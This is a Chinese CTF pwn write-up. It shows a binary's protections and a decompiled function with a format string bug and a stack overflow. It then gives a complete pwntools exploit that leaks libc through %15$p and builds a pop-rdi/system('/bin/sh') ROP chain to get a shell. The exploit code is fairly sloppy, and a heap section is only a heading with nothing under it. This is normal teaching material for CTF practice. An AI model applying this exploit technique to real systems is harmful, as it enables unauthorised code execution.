文件安全机制
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
file信息
./pwn: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, for GNU/Linux 2.6.32, BuildID[sha1]=392d9fb8fb2f5ba26bb829789ac6ec1d928c4ff0, not stripped
漏洞点1
int getname1()
{
int result; // eax
char s; // [rsp+0h] [rbp-20h]
char format; // [rsp+10h] [rbp-10h]
puts("input your name");
readi(&format, 24LL);
printf(&format);
memset(&s, 0, 0x10uLL);
puts("Let's start a game, can you guess the keyword?");
read(0, &s, 0x90uLL);
if ( !strcmp(&s, keyword) )
result = puts("good boy\n");
else
result = puts("fail");
return result;
}
漏洞点1的利用方法是:利用格式化和栈溢出
知识点1
libc_start_main = eval('0x'+ p.recv(12)) - libc.symbols['__libc_start_main'] -0xf0
对照libcsearch使用,作用类似
这是知道libc_base的情况下
libc_base+libc.search("/bin/sh").next()
libc_base+libc.symbols['system']
漏洞点二(堆)
EXP1
from pwn import*
context.log_level = 'debug'
p = process("./pwn")
libc = ELF("./libc.so.6")
p.recvuntil("choice:\n")
p.sendline("1")
p.recvuntil("input your name\n")
p.sendline("%15$p") #8+7
p.recvuntil("0x")
libc_start_main = eval('0x'+ p.recv(12))
libc_base = libc_start_main - libc.symbols['__libc_start_main'] -0xf0
print ("[+]-----> libc_start_main = ") +hex(libc_base)
p.recvuntil("can you guess the keyword?")
pop_rdi_addr = 0x401213
#======1=====
payload = "a"*40 + p64(pop_rdi_addr)
payload += p64(libc_base+libc.search("/bin/sh").next()) + p64(libc_base+libc.symbols['system'])
#======2=====
#猜的没错,这个地方的利用方法很多 2 3 4。。。。
p.sendline(payload)
p.sendline("ls")
p.interactive()